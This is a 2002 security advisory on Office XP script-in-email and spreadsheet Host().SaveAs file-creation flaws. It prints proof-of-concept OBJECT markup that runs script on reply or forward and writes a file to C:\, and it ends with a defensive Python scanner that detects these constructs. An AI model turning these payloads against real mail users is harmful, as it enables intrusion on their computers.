
guninski-53.txt

02 Apr 2002 | Reported by Georgi Guninski | Type: packetstorm | Source: packetstormsecurity.com

Office XP has vulnerabilities allowing script embedding in emails and potential file creation exploits.

` Georgi Guninski security advisory #53, 2002  
More Office XP problems  
Systems affected:  
Office XP  
Risk: High  
Date: 31 March 2002  
Legal Notice:  
This Advisory is Copyright (c) 2002 Georgi Guninski.  
You may distribute it unmodified.  
You may not modify it and distribute it or distribute parts  
of it without the author's written permission.  
If you want to link to this content use the URL:  
http://www.guninski.com/m$oxp-2.html   
Disclaimer:  
The information in this advisory is believed to be true though  
it may be false.  
The opinions expressed in this advisory and program are my own and  
not of any company. The usual standard disclaimer applies,  
especially the fact that Georgi Guninski is not liable for any damages  
caused by direct or indirect use of the information or functionality  
provided by this advisory or program. Georgi Guninski bears no  
responsibility for content or misuse of this advisory or program or  
any derivatives thereof.  
Description:  
Actually there are at least two vulnerabilities in Office XP.  
1. It is possible to embed active content (object + script) in HTML mail  
which is triggered if the user chooses reply or forward to the mail.  
This opens an exploit scenario for forcing the user to visit a page  
in the internet zone of IE at least. For another exploit scenario  
check (2)  
2. There is a bug in the MS spreadsheet component, namely in its Host()  
function, which may be exploited with the help of (1) or probably from  
any document opened with an Office application. This buggy function  
allows creating files with arbitrary names, and their content may be  
specified to an extent that is sufficient to place an  
executable file (.hta) in the user's startup directory, which may lead to  
taking full control over the user's computer.  
This probably may be called cross application scripting because  
one application uses an object from another application.  
Details:  
The following must be put in HTML email which should be opened with  
Outlook XP and the user should choose reply or forward.  
1.  
--------------------------------------  
<OBJECT id=WebBrowser1 height=150 width=300  
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>  
<PARAM NAME="ExtentX" VALUE="7938">  
<PARAM NAME="ExtentY" VALUE="3969">  
<PARAM NAME="ViewMode" VALUE="0">  
<PARAM NAME="Offline" VALUE="0">  
<PARAM NAME="Silent" VALUE="0">  
<PARAM NAME="RegisterAsBrowser" VALUE="1">  
<PARAM NAME="RegisterAsDropTarget" VALUE="1">  
<PARAM NAME="AutoArrange" VALUE="0">  
<PARAM NAME="NoClientEdge" VALUE="0">  
<PARAM NAME="AlignLeft" VALUE="0">  
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">  
<PARAM NAME="Location" VALUE="about:/dev/random<script>while (42)  
alert('HOHOHO\nTrying to sell trustworthy  
computing\nHOHOHO')</script>">  
<PARAM NAME="ReadyState" VALUE="4">  
</OBJECT>  
-------------------------------------  
2.  
The Office spreadsheet component is something like a mini Excel.  
It may be embedded in web pages (seems not exploitable) and in  
Office documents (seems exploitable).  
It supports the Host() function, which returns the hosting object.  
So if you put '=Host().SaveAs("name")' in a formula, a file with that name  
shall be created.  
[Note, lines may be wrapped]  
---------------------------------------  
<h1>  
Hehe. Triyng to sell trustworthy computing.  
</h1>  
<object  
classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1  
v:shapes="_x0000_s1026" class=shape width=81 height=81  
u1:shapes="_x0000_s1025">  
<param name=DataType value=XMLURL>  
<param name=XMLData  
value="<?xml version="1.0"?>   
<ss:Workbook  
xmlns:o="urn:schemas-microsoft-com:office:office"   
  
xmlns:x="urn:schemas-microsoft-com:office:excel"   
  
xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet" &#  
10;  
xmlns:c="urn:schemas-microsoft-com:office:component:spreadsheet&quo  
t;   
  
xmlns:html="http://www.w3.org/TR/REC-html40">   
  
<x:ExcelWorkbook>   
  
<x:ProtectStructure>False</x:ProtectStructure>   
  
<x:ActiveSheet>0</x:ActiveSheet>   
  
</x:ExcelWorkbook>   
<ss:Styles>   
  
<ss:Style ss:ID="Default">   
<ss:Alignment  
ss:Horizontal="Automatic" ss:Rotate="0.0"  
ss:Vertical="Bottom"   
  
ss:ReadingOrder="Context"/>   
  
<ss:Borders>   
</ss:Borders>   
  
<ss:Font ss:FontName="Arial" ss:Size="10"  
ss:Color="Automatic" ss:Bold="0"   
  
ss:Italic="0" ss:Underline="None"/>   
  
<ss:Interior ss:Color="Automatic"  
ss:Pattern="None"/>   
<ss:NumberFormat  
ss:Format="General"/>   
<ss:Protection  
ss:Protected="1"/>   
</ss:Style>   
  
</ss:Styles>   
<c:ComponentOptions>   
  
<c:Label>   
<c:Caption>Microsoft Office  
Spreadsheet</c:Caption>   
</c:Label>   
  
<c:PreventPropBrowser/>   
  
<c:MaxHeight>80%</c:MaxHeight>   
  
<c:MaxWidth>80%</c:MaxWidth>   
  
<c:NextSheetNumber>1</c:NextSheetNumber>   
  
</c:ComponentOptions>   
  
<x:WorkbookOptions>   
  
<c:OWCVersion>10.0.0.2621 </c:OWCVersion>   
  
<x:DisableUndo/>   
</x:WorkbookOptions>   
  
<ss:Worksheet ss:Name="Sheet1">   
  
<x:WorksheetOptions>   
<x:Selected/>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
<ss:Table  
ss:ExpandedColumnCount="1"  
ss:ExpandedRowCount="1"   
  
ss:DefaultColumnWidth="48.0"  
ss:DefaultRowHeight="12.75">   
  
<ss:Row>   
<ss:Cell  
ss:Formula='=HOST().SaveAs("C:\GGGG5")'>   
  
<ss:Data  
ss:Type="Boolean">1</ss:Data>   
  
</ss:Cell>   
</ss:Row>   
  
</ss:Table>   
</ss:Worksheet>   
  
<ss:Worksheet ss:Name="Sheet2">   
  
<x:WorksheetOptions>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
</ss:Worksheet>   
  
<ss:Worksheet ss:Name="Sheet3">   
  
<x:WorksheetOptions>   
  
<x:ViewableRange>R1:R262144</x:ViewableRange>   
  
<x:Selection>R1C1</x:Selection>   
  
<x:TopRowVisible>0</x:TopRowVisible>   
  
<x:LeftColumnVisible>0</x:LeftColumnVisible>   
  
<x:ProtectContents>False</x:ProtectContents>   
  
</x:WorksheetOptions>   
  
<c:WorksheetOptions>   
  
</c:WorksheetOptions>   
</ss:Worksheet>   
  
<o:DocumentProperties>   
  
<o:Author>ad</o:Author>   
  
<o:LastAuthor>ad</o:LastAuthor>   
  
<o:Created>2002-03-17T12:07:37Z</o:Created>   
  
<o:Company>g</o:Company>   
  
<o:Version>10.2625</o:Version>   
  
</o:DocumentProperties>   
  
<o:OfficeDocumentSettings>   
  
<o:DownloadComponents/>   
<o:LocationOfComponents  
HRef="file:///E:\"/>   
  
</o:OfficeDocumentSettings>   
</ss:Workbook> &#10  
;">  
<param name=AllowPropertyToolbox value=0>  
<param name=AutoFit value=0>  
<param name=Calculation value=-4105>  
<param name=Caption value="Microsoft Office Spreadsheet">  
<param name=DisplayColumnHeadings value=-1>  
<param name=DisplayGridlines value=-1>  
<param name=DisplayHorizontalScrollBar value=-1>  
<param name=DisplayOfficeLogo value=-1>  
<param name=DisplayPropertyToolbox value=0>  
<param name=DisplayRowHeadings value=-1>  
<param name=DisplayTitleBar value=0>  
<param name=DisplayToolbar value=-1>  
<param name=DisplayVerticalScrollBar value=-1>  
<param name=DisplayWorkbookTabs value=-1>  
<param name=EnableEvents value=-1>  
<param name=MaxHeight value="80%">  
<param name=MaxWidth value="80%">  
<param name=MoveAfterReturn value=-1>  
<param name=MoveAfterReturnDirection value=-4121>  
<param name=RightToLeft value=0>  
<param name=ScreenUpdating value=-1>  
<param name=EnableUndo value=0>  
</object>  
---------------------------------  
Workaround/Solution:  
The solution is to get a real mail client and office applications.  
Workaround for this particular problem is:  
For (1) - disable everything that contains "active" in IE.  
For (2) - (Have not tested it personally)  
Deregister and delete the ms office spreadsheet component  
Vendor status:  
Microsoft was notified on 17 March 2002.  
They had 2 weeks to produce a patch but didn't.  
Regards,  
Georgi Guninski  
http://www.guninski.com  
  
`
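
A mail-gateway style check for the two constructs shown in the advisory, as an added example that is not part of the original advisory: it flags OBJECT tags carrying either CLSID from the proof-of-concept markup and PARAM values that contain a script tag or a Host().SaveAs formula. The names `ObjectScanner`, `scan_message` and `SAMPLE` are assumptions made for illustration, and the sample message is constructed.

```python
import re
from email import message_from_string
from html.parser import HTMLParser

# CLSIDs copied from the two OBJECT tags in the advisory.
FLAGGED = {
    "8856F961-340A-11D0-A96B-00C04FD705A2": "WebBrowser control",
    "0002E551-0000-0000-C000-000000000046": "Office spreadsheet component",
}
HOST_SAVEAS = re.compile(r"=\s*HOST\s*\(\s*\)\s*\.\s*SaveAs", re.I)
SCRIPT_TAG = re.compile(r"<\s*script", re.I)

class ObjectScanner(HTMLParser):
    """Records OBJECT/PARAM constructs of interest in one HTML body."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and a.get("classid"):
            clsid = a["classid"].upper().replace("CLSID:", "").strip("{} ")
            label = FLAGGED.get(clsid, "other ActiveX " + clsid)
            self.findings.append("object: " + label)
        elif tag == "param":
            # Attribute entities are already decoded by HTMLParser here.
            if HOST_SAVEAS.search(a.get("value", "")):
                self.findings.append("param: Host().SaveAs formula")
            if SCRIPT_TAG.search(a.get("value", "")):
                self.findings.append("param: script in value")

def scan_message(raw):
    """Return findings for every text/html part of an RFC 822 message."""
    scanner = ObjectScanner()
    for part in message_from_string(raw).walk():
        if part.get_content_type() == "text/html":
            body = part.get_payload(decode=True) or b""
            charset = part.get_content_charset() or "utf-8"
            scanner.feed(body.decode(charset, "replace"))
    scanner.close()
    return scanner.findings

# Constructed sample: an inert fragment, not a working document.
SAMPLE = (
    "Subject: test\nMIME-Version: 1.0\nContent-Type: text/html; charset=utf-8\n\n"
    '<object classid="clsid:0002e551-0000-0000-c000-000000000046">'
    "<param name=XMLData value=\"&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;x&quot;)'/&gt;\">"
    "</object>\n"
)
```

Any OBJECT tag with a classid is reported, so a gateway can quarantine HTML mail that embeds ActiveX at all and use the two named CLSIDs only to raise severity.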
